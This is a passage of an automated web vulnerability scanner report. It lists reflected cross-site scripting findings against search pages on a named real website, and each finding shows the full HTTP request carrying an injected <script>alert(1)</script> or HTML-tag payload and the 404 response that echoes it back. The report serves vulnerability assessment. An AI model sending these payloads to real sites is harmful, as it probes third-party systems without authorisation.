2.1061. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cb57<script>alert(1)</script>99084b0a679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/122cb57<script>alert(1)</script>99084b0a679/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/122cb57<script>alert(1)</script>99084b0a679/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1062. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3087f<script>alert(1)</script>6239f9679d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes3087f<script>alert(1)</script>6239f9679d8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes3087f<script>alert(1)</script>6239f9679d8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1063. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56cfd<script>alert(1)</script>d45e40a22dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos56cfd<script>alert(1)</script>d45e40a22dc/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos56cfd<script>alert(1)</script>d45e40a22dc/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1064. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4d80a<script>alert(1)</script>0fc09b01bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images4d80a<script>alert(1)</script>0fc09b01bc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images4d80a<script>alert(1)</script>0fc09b01bc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1065. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 84e1d<script>alert(1)</script>5317627e5d8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/search.php84e1d<script>alert(1)</script>5317627e5d8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php84e1d<script>alert(1)</script>5317627e5d8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1066. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 94bb0<a>9619d15a96a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search94bb0<a>9619d15a96a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search94bb0<a>9619d15a96a&opt=2 was not found on this server.</p>
...[SNIP]...

2.1067. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 58dfd<a>40e948bb80a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...58dfd<a>40e948bb80a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...58dfd<a>40e948bb80a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1068. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1939<script>alert(1)</script>da71f2c2433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1939<script>alert(1)</script>da71f2c2433=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1939<script>alert(1)</script>da71f2c2433=1 was not found on this server.</p>
...[SNIP]...

2.1069. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6835<a>941bbfc43af was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6835<a>941bbfc43af HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6835<a>941bbfc43af was not found on this server.</p>
...[SNIP]...

2.1070. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f8d<script>alert(1)</script>1141915b360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17f8d<script>alert(1)</script>1141915b360/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail17f8d<script>alert(1)</script>1141915b360/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1071. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fd556<script>alert(1)</script>26d60d3c1e7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12fd556<script>alert(1)</script>26d60d3c1e7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12fd556<script>alert(1)</script>26d60d3c1e7/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1072. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5760f<script>alert(1)</script>96e852f202b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes5760f<script>alert(1)</script>96e852f202b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes5760f<script>alert(1)</script>96e852f202b/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1073. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4197a<script>alert(1)</script>bddef9ac525 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos4197a<script>alert(1)</script>bddef9ac525/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos4197a<script>alert(1)</script>bddef9ac525/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1074. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload de7af<script>alert(1)</script>06a08444635 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/search.phpde7af<script>alert(1)</script>06a08444635?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.phpde7af<script>alert(1)</script>06a08444635?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1075. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 11c5c<a>e0e195ba547 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search11c5c<a>e0e195ba547&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search11c5c<a>e0e195ba547&opt=2 was not found on this server.</p>
...[SNIP]...

2.1076. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c6c08<a>1efed3a152f was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...c6c08<a>1efed3a152f&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...c6c08<a>1efed3a152f&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1077. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11b86<script>alert(1)</script>8c26d4a032e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&11b86<script>alert(1)</script>8c26d4a032e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&11b86<script>alert(1)</script>8c26d4a032e=1 was not found on this server.</p>
...[SNIP]...

2.1078. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload b488f<a>ae4ec27c234 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2b488f<a>ae4ec27c234 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
